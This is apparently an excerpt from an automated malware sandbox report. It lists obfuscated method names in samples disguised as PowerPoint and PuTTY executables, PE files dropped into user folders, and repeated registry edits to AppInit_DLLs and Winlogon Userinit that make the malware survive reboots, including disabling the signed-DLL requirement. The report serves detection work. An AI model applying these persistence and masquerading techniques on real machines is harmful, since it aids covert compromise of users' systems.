Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, YeASamleCu.cs	High entropy of concatenated method names: 'xnIxVRYrPBFYu', 'bdMoOrQxtvgEAC', 'aaKjZcdK', 'koKrGQSFGdzIY', 'oCRzuMRRQWnpbv', 'VNyTdDahZrdday', 'DvBkWgHcjxR', 'XnDRpWQkPBp', 'nNVsIQjrStTsoqZ', 'OkOVMjCtV'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, BepYSwIiYsKTkc.cs	High entropy of concatenated method names: '_003CScreenShot_003Eb__16_0', 'hgYqlsJf', 'sLrZOuAb', 'kOWJOWvoQlcxdqy', 'DFyYevrypfGFjUe', 'iYAOjYSCuxcYDC', 'VsaLoCDQoW', 'UiPqEvHkOEq', 'PenvdgTTvmQlM', 'JppfHLrLD'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, gEjezvihrA.cs	High entropy of concatenated method names: 'SNPMxFexzSMQ', 'gDOlHAunu', 'YzPPDudfl', 'vNRfanEABU', 'TnWxvgwZqFpXCrN', 'paCVmbxQTmjLT', 'umZLELsRHOgGvNG', 'PnNGOazzMspGeJ', 'lGuLDxqnBpYTnog', 'kKdWwyNhUmay'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, WkKaRrezv.cs	High entropy of concatenated method names: 'VsYjwdcp', 'jAGsauzxlaBtYm', 'uBIfrUJxdEg', 'ROggXEKEH', 'skfRutZuJx', 'ypvVxxTaC', 'nujiiFtdoNhS', 'JYzaaPYjvjES', 'kLZHreEmFpw', 'LofQUjZgLlxyX'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, xeRJPXmwavvZh.cs	High entropy of concatenated method names: 'VuqpJUTheDe', 'znrPvdHAVP', 'cAyIiGOFzkOT', 'HOUaRQzOf', 'XzFKzRRgBGUNoLM', 'bQxfglThIhJhj', 'PMxBaJdw', 'niDNNpuaJN', 'ojQARmfXCSIjw', 'qIPmkDHfCJxdXGs'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, rZjCSSmKXaUqXO.cs	High entropy of concatenated method names: 'dlETBnKBmzDv', 'qxyyxYISrIfceYU', 'mEonbfpiuJAgXx', 'OXrTZcVt', 'FJldZrWPqJAuPIT', 'HQDnXcvuE', 'FmEuQQLohR', 'MIDmlqOxJzPYIRM', 'FbdOrYJmkK', 'tjiaaBSvHzAmmhx'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, KaCEkWzArz.cs	High entropy of concatenated method names: 'TRJrolTMln', 'tonIFMNIZBwi', 'MKXzNLdyFCKiXye', 'BucahgNQbRnniZ', 'XiNfeOUyZ', 'eolcahOiV', 'HTIOfxGXwYq', 'frnzKTAYhv', 'QDsboAkZ', 'NADDayzg'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, vzOQfCjdwrwlD.cs	High entropy of concatenated method names: 'DZSBOsEdSkftm', 'CHkhhdMlBNYW', 'xQXiDVjowcoBI', 'RgdllPHbpHPD', 'XRYFcrMHNvC', 'XCoFfwgZxuFX', 'mGZVbPTAvMWX', 'LJwYElbJOMT', 'KKieccLBcpl', 'llfibbqRhIkXd'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, wgtJFxwmDCkn.cs	High entropy of concatenated method names: 'bqEIfXfZOiYonfU', 'nuaTxiBEdpUSV', 'ZXsCuXbSrjW', 'hyVVRScD', 'HJTAtpzfpD', 'DpIBwllwHV', 'rxtACjIY', 'pRIRNYBA', 'bnBgIzrpUYfgf', 'uESWGsmQWRAXmhq'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, WfcSxBiJWHQqTp.cs	High entropy of concatenated method names: 'PROyGYfLwtjlP', 'HShuatetG', 'uCbiJigZKDT', 'HxqQqUgYOQSyPoi', 'swEWKuEExwBNNJa', 'rILkEKCKM', 'FdjcSVAkgOzxn', 'tlSuSTLEq', 'HGdyrituJ', 'paUVdgNdcLMt'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, LtuDkZEKFIyjL.cs	High entropy of concatenated method names: 'zIEsmyYznoUPjWT', 'ZPaJmzDKLHfp', 'hMOQgSAS', 'UGOLGFiVphrci', 'IBJAEtgeTivGc', 'yDDSKovU', 'atycqSyybydGPWS', 'YEpnfQzccXmdYRu', 'nGjHGRqMUjTIyy', 'gkXmjFhPKtVzT'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, uBecUVPQ.cs	High entropy of concatenated method names: '_003CStart_003Eb__1_0', '_003CUninstall_003Eb__2_0', '_003CLoopInstall_003Eb__7_0', '_003CStartAsBypass_003Eb__10_0', 'AaqmPntZxR', 'BYucXNJtAttu', 'fCgVMnQqp', 'jZNmaLjR', 'jSzWGBFGMVP', 'GfeHMHXNKBq'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, rTbUtmWcnO.cs	High entropy of concatenated method names: 'ETuZUDsFHdsPqem', 'WQoYDPhzWL', 'NHsdoETuthXISt', 'YkyElqHXzL', 'pvomvDJNfyOzEKW', 'thzIVfnqxASaz', 'ktSpPYGH', 'UzFORJkutOGOq', 'DcKHyouk', 'NZOVhOvydlufJ'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, kICtJPxSafoGvi.cs	High entropy of concatenated method names: 'izoVMEnyZoDuo', 'ZzsriRjjE', 'MObKRbqhKZYMlY', 'mxKcEGVJI', 'gvPMQxzu', 'JxcchyxVkPlMOTi', 'UZGAjqFTJlfbVtb', 'SmPKJUcdGkl', 'WoRcgQwXstPSrJT', 'TWAqnMubEYmzwdu'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, bNrRgbuKfhLKh.cs	High entropy of concatenated method names: 'dcgBjalp', 'QTRdGVQS', 'MNYAcNFsv', 'ngqakeeDYY', 'XzmIbxPynoOP', 'xUecATvq', 'TBYZthybSsue', 'OmrAPqtHdZRpcP', 'BCEcosfkkBEizMW', 'UWIGslzDFxX'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, KPKTbmek.cs	High entropy of concatenated method names: 'ywDpYFYr', 'iSYaQgfunkCfdU', 'LGzzzbmHVN', 'sIvgJerM', 'udjzdohzui', 'UcoeSGZrOwK', 'MKoWyGaX', 'RCUiWzWLunNnrk', 'UROCFzyVjZ', 'opRisTKhDaT'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, YeASamleCu.cs	High entropy of concatenated method names: 'xnIxVRYrPBFYu', 'bdMoOrQxtvgEAC', 'aaKjZcdK', 'koKrGQSFGdzIY', 'oCRzuMRRQWnpbv', 'VNyTdDahZrdday', 'DvBkWgHcjxR', 'XnDRpWQkPBp', 'nNVsIQjrStTsoqZ', 'OkOVMjCtV'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, BepYSwIiYsKTkc.cs	High entropy of concatenated method names: '_003CScreenShot_003Eb__16_0', 'hgYqlsJf', 'sLrZOuAb', 'kOWJOWvoQlcxdqy', 'DFyYevrypfGFjUe', 'iYAOjYSCuxcYDC', 'VsaLoCDQoW', 'UiPqEvHkOEq', 'PenvdgTTvmQlM', 'JppfHLrLD'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, gEjezvihrA.cs	High entropy of concatenated method names: 'SNPMxFexzSMQ', 'gDOlHAunu', 'YzPPDudfl', 'vNRfanEABU', 'TnWxvgwZqFpXCrN', 'paCVmbxQTmjLT', 'umZLELsRHOgGvNG', 'PnNGOazzMspGeJ', 'lGuLDxqnBpYTnog', 'kKdWwyNhUmay'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, WkKaRrezv.cs	High entropy of concatenated method names: 'VsYjwdcp', 'jAGsauzxlaBtYm', 'uBIfrUJxdEg', 'ROggXEKEH', 'skfRutZuJx', 'ypvVxxTaC', 'nujiiFtdoNhS', 'JYzaaPYjvjES', 'kLZHreEmFpw', 'LofQUjZgLlxyX'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, xeRJPXmwavvZh.cs	High entropy of concatenated method names: 'VuqpJUTheDe', 'znrPvdHAVP', 'cAyIiGOFzkOT', 'HOUaRQzOf', 'XzFKzRRgBGUNoLM', 'bQxfglThIhJhj', 'PMxBaJdw', 'niDNNpuaJN', 'ojQARmfXCSIjw', 'qIPmkDHfCJxdXGs'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, rZjCSSmKXaUqXO.cs	High entropy of concatenated method names: 'dlETBnKBmzDv', 'qxyyxYISrIfceYU', 'mEonbfpiuJAgXx', 'OXrTZcVt', 'FJldZrWPqJAuPIT', 'HQDnXcvuE', 'FmEuQQLohR', 'MIDmlqOxJzPYIRM', 'FbdOrYJmkK', 'tjiaaBSvHzAmmhx'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, KaCEkWzArz.cs	High entropy of concatenated method names: 'TRJrolTMln', 'tonIFMNIZBwi', 'MKXzNLdyFCKiXye', 'BucahgNQbRnniZ', 'XiNfeOUyZ', 'eolcahOiV', 'HTIOfxGXwYq', 'frnzKTAYhv', 'QDsboAkZ', 'NADDayzg'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, vzOQfCjdwrwlD.cs	High entropy of concatenated method names: 'DZSBOsEdSkftm', 'CHkhhdMlBNYW', 'xQXiDVjowcoBI', 'RgdllPHbpHPD', 'XRYFcrMHNvC', 'XCoFfwgZxuFX', 'mGZVbPTAvMWX', 'LJwYElbJOMT', 'KKieccLBcpl', 'llfibbqRhIkXd'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, wgtJFxwmDCkn.cs	High entropy of concatenated method names: 'bqEIfXfZOiYonfU', 'nuaTxiBEdpUSV', 'ZXsCuXbSrjW', 'hyVVRScD', 'HJTAtpzfpD', 'DpIBwllwHV', 'rxtACjIY', 'pRIRNYBA', 'bnBgIzrpUYfgf', 'uESWGsmQWRAXmhq'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, WfcSxBiJWHQqTp.cs	High entropy of concatenated method names: 'PROyGYfLwtjlP', 'HShuatetG', 'uCbiJigZKDT', 'HxqQqUgYOQSyPoi', 'swEWKuEExwBNNJa', 'rILkEKCKM', 'FdjcSVAkgOzxn', 'tlSuSTLEq', 'HGdyrituJ', 'paUVdgNdcLMt'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, LtuDkZEKFIyjL.cs	High entropy of concatenated method names: 'zIEsmyYznoUPjWT', 'ZPaJmzDKLHfp', 'hMOQgSAS', 'UGOLGFiVphrci', 'IBJAEtgeTivGc', 'yDDSKovU', 'atycqSyybydGPWS', 'YEpnfQzccXmdYRu', 'nGjHGRqMUjTIyy', 'gkXmjFhPKtVzT'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, uBecUVPQ.cs	High entropy of concatenated method names: '_003CStart_003Eb__1_0', '_003CUninstall_003Eb__2_0', '_003CLoopInstall_003Eb__7_0', '_003CStartAsBypass_003Eb__10_0', 'AaqmPntZxR', 'BYucXNJtAttu', 'fCgVMnQqp', 'jZNmaLjR', 'jSzWGBFGMVP', 'GfeHMHXNKBq'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, rTbUtmWcnO.cs	High entropy of concatenated method names: 'ETuZUDsFHdsPqem', 'WQoYDPhzWL', 'NHsdoETuthXISt', 'YkyElqHXzL', 'pvomvDJNfyOzEKW', 'thzIVfnqxASaz', 'ktSpPYGH', 'UzFORJkutOGOq', 'DcKHyouk', 'NZOVhOvydlufJ'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, kICtJPxSafoGvi.cs	High entropy of concatenated method names: 'izoVMEnyZoDuo', 'ZzsriRjjE', 'MObKRbqhKZYMlY', 'mxKcEGVJI', 'gvPMQxzu', 'JxcchyxVkPlMOTi', 'UZGAjqFTJlfbVtb', 'SmPKJUcdGkl', 'WoRcgQwXstPSrJT', 'TWAqnMubEYmzwdu'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, bNrRgbuKfhLKh.cs	High entropy of concatenated method names: 'dcgBjalp', 'QTRdGVQS', 'MNYAcNFsv', 'ngqakeeDYY', 'XzmIbxPynoOP', 'xUecATvq', 'TBYZthybSsue', 'OmrAPqtHdZRpcP', 'BCEcosfkkBEizMW', 'UWIGslzDFxX'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, KPKTbmek.cs	High entropy of concatenated method names: 'ywDpYFYr', 'iSYaQgfunkCfdU', 'LGzzzbmHVN', 'sIvgJerM', 'udjzdohzui', 'UcoeSGZrOwK', 'MKoWyGaX', 'RCUiWzWLunNnrk', 'UROCFzyVjZ', 'opRisTKhDaT'
Source: xdwdPutty.exe.33.dr, YeASamleCu.cs	High entropy of concatenated method names: 'xnIxVRYrPBFYu', 'bdMoOrQxtvgEAC', 'aaKjZcdK', 'koKrGQSFGdzIY', 'oCRzuMRRQWnpbv', 'VNyTdDahZrdday', 'DvBkWgHcjxR', 'XnDRpWQkPBp', 'nNVsIQjrStTsoqZ', 'OkOVMjCtV'
Source: xdwdPutty.exe.33.dr, BepYSwIiYsKTkc.cs	High entropy of concatenated method names: '_003CScreenShot_003Eb__16_0', 'hgYqlsJf', 'sLrZOuAb', 'kOWJOWvoQlcxdqy', 'DFyYevrypfGFjUe', 'iYAOjYSCuxcYDC', 'VsaLoCDQoW', 'UiPqEvHkOEq', 'PenvdgTTvmQlM', 'JppfHLrLD'
Source: xdwdPutty.exe.33.dr, gEjezvihrA.cs	High entropy of concatenated method names: 'SNPMxFexzSMQ', 'gDOlHAunu', 'YzPPDudfl', 'vNRfanEABU', 'TnWxvgwZqFpXCrN', 'paCVmbxQTmjLT', 'umZLELsRHOgGvNG', 'PnNGOazzMspGeJ', 'lGuLDxqnBpYTnog', 'kKdWwyNhUmay'
Source: xdwdPutty.exe.33.dr, WkKaRrezv.cs	High entropy of concatenated method names: 'VsYjwdcp', 'jAGsauzxlaBtYm', 'uBIfrUJxdEg', 'ROggXEKEH', 'skfRutZuJx', 'ypvVxxTaC', 'nujiiFtdoNhS', 'JYzaaPYjvjES', 'kLZHreEmFpw', 'LofQUjZgLlxyX'
Source: xdwdPutty.exe.33.dr, xeRJPXmwavvZh.cs	High entropy of concatenated method names: 'VuqpJUTheDe', 'znrPvdHAVP', 'cAyIiGOFzkOT', 'HOUaRQzOf', 'XzFKzRRgBGUNoLM', 'bQxfglThIhJhj', 'PMxBaJdw', 'niDNNpuaJN', 'ojQARmfXCSIjw', 'qIPmkDHfCJxdXGs'
Source: xdwdPutty.exe.33.dr, rZjCSSmKXaUqXO.cs	High entropy of concatenated method names: 'dlETBnKBmzDv', 'qxyyxYISrIfceYU', 'mEonbfpiuJAgXx', 'OXrTZcVt', 'FJldZrWPqJAuPIT', 'HQDnXcvuE', 'FmEuQQLohR', 'MIDmlqOxJzPYIRM', 'FbdOrYJmkK', 'tjiaaBSvHzAmmhx'
Source: xdwdPutty.exe.33.dr, KaCEkWzArz.cs	High entropy of concatenated method names: 'TRJrolTMln', 'tonIFMNIZBwi', 'MKXzNLdyFCKiXye', 'BucahgNQbRnniZ', 'XiNfeOUyZ', 'eolcahOiV', 'HTIOfxGXwYq', 'frnzKTAYhv', 'QDsboAkZ', 'NADDayzg'
Source: xdwdPutty.exe.33.dr, vzOQfCjdwrwlD.cs	High entropy of concatenated method names: 'DZSBOsEdSkftm', 'CHkhhdMlBNYW', 'xQXiDVjowcoBI', 'RgdllPHbpHPD', 'XRYFcrMHNvC', 'XCoFfwgZxuFX', 'mGZVbPTAvMWX', 'LJwYElbJOMT', 'KKieccLBcpl', 'llfibbqRhIkXd'
Source: xdwdPutty.exe.33.dr, wgtJFxwmDCkn.cs	High entropy of concatenated method names: 'bqEIfXfZOiYonfU', 'nuaTxiBEdpUSV', 'ZXsCuXbSrjW', 'hyVVRScD', 'HJTAtpzfpD', 'DpIBwllwHV', 'rxtACjIY', 'pRIRNYBA', 'bnBgIzrpUYfgf', 'uESWGsmQWRAXmhq'
Source: xdwdPutty.exe.33.dr, WfcSxBiJWHQqTp.cs	High entropy of concatenated method names: 'PROyGYfLwtjlP', 'HShuatetG', 'uCbiJigZKDT', 'HxqQqUgYOQSyPoi', 'swEWKuEExwBNNJa', 'rILkEKCKM', 'FdjcSVAkgOzxn', 'tlSuSTLEq', 'HGdyrituJ', 'paUVdgNdcLMt'
Source: xdwdPutty.exe.33.dr, LtuDkZEKFIyjL.cs	High entropy of concatenated method names: 'zIEsmyYznoUPjWT', 'ZPaJmzDKLHfp', 'hMOQgSAS', 'UGOLGFiVphrci', 'IBJAEtgeTivGc', 'yDDSKovU', 'atycqSyybydGPWS', 'YEpnfQzccXmdYRu', 'nGjHGRqMUjTIyy', 'gkXmjFhPKtVzT'
Source: xdwdPutty.exe.33.dr, uBecUVPQ.cs	High entropy of concatenated method names: '_003CStart_003Eb__1_0', '_003CUninstall_003Eb__2_0', '_003CLoopInstall_003Eb__7_0', '_003CStartAsBypass_003Eb__10_0', 'AaqmPntZxR', 'BYucXNJtAttu', 'fCgVMnQqp', 'jZNmaLjR', 'jSzWGBFGMVP', 'GfeHMHXNKBq'
Source: xdwdPutty.exe.33.dr, rTbUtmWcnO.cs	High entropy of concatenated method names: 'ETuZUDsFHdsPqem', 'WQoYDPhzWL', 'NHsdoETuthXISt', 'YkyElqHXzL', 'pvomvDJNfyOzEKW', 'thzIVfnqxASaz', 'ktSpPYGH', 'UzFORJkutOGOq', 'DcKHyouk', 'NZOVhOvydlufJ'
Source: xdwdPutty.exe.33.dr, kICtJPxSafoGvi.cs	High entropy of concatenated method names: 'izoVMEnyZoDuo', 'ZzsriRjjE', 'MObKRbqhKZYMlY', 'mxKcEGVJI', 'gvPMQxzu', 'JxcchyxVkPlMOTi', 'UZGAjqFTJlfbVtb', 'SmPKJUcdGkl', 'WoRcgQwXstPSrJT', 'TWAqnMubEYmzwdu'
Source: xdwdPutty.exe.33.dr, bNrRgbuKfhLKh.cs	High entropy of concatenated method names: 'dcgBjalp', 'QTRdGVQS', 'MNYAcNFsv', 'ngqakeeDYY', 'XzmIbxPynoOP', 'xUecATvq', 'TBYZthybSsue', 'OmrAPqtHdZRpcP', 'BCEcosfkkBEizMW', 'UWIGslzDFxX'
Source: xdwdPutty.exe.33.dr, KPKTbmek.cs	High entropy of concatenated method names: 'ywDpYFYr', 'iSYaQgfunkCfdU', 'LGzzzbmHVN', 'sIvgJerM', 'udjzdohzui', 'UcoeSGZrOwK', 'MKoWyGaX', 'RCUiWzWLunNnrk', 'UROCFzyVjZ', 'opRisTKhDaT'

Drops PE files

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	File created: C:\Users\user\Videos\xdwdPutty.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	File created: C:\Users\user\xdwdPutty.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	File created: C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe	Jump to dropped file

Drops PE files to the user directory

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

File created: C:\Users\user\xdwdPutty.exe

Jump to dropped file

Boot Survival

Allows loading of unsigned dll using appinit_dll

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

Registry value created: RequireSignedAppInit_DLLs 0

Jump to behavior

Creates an undocumented autostart registry key

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows AppInit_DLLs	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows LoadAppInit_DLLs	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
